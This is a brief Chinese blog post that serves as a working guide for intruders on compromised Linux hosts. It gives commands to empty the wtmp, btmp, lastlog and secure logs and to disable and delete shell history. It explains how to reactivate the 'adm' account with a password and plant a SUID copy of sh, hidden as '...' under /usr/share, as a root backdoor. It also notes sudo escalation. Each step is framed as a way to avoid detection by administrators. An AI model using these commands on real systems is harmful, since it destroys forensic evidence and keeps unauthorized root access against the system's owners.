linux清理入侵日志和维持权限

清除日志

1、清除登录ssh登录日志、安全日志、last、lastb等

cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure

2、history删除

set +o history (最前面有空格)

输入该命令后,在当前终端,之后输入的所有命令都不会被history记录(防止搞到一半被管理员断网,记录留下)

history -c

输入该命令之后,当前终端所有输过的命令不会被记录到history(一般这>个就够了)

rm -rf ~/.bash_history

删除history,意思之前管理员记录的history也没了,有的管理员有查看history的习惯,这条慎用

linux suid提权

前提:以root权限激活用户,并创建suid提权的后门
激活adm用户(linux自带很多无用用户,如adm)
usermod -s /bin/bash adm
echo "password"|passwd --stdin adm
suid提权,把sh复制重命名为...,放在其他文件夹,加s权限,重命名为...是为了不被发现,ls看不到,ls -la一般人也看不出
cp /bin/sh /usr/share/...
chmod a+s /usr/share/...
使用时以adm ssh登录,然后输入以下命令就是root权限了
./usr/share/... -p
经测试3.10.0可以完全root权限,有些版本权限会有问题

linux sudo提权

前提:linux /etc/sudoers文件有添加你普通用户的账号


在以普通用户test执行sudo bash
输入test用户的密码
同理sudo vim sudo sh也是可以的

你可能感兴趣的:(linux清理入侵日志和维持权限)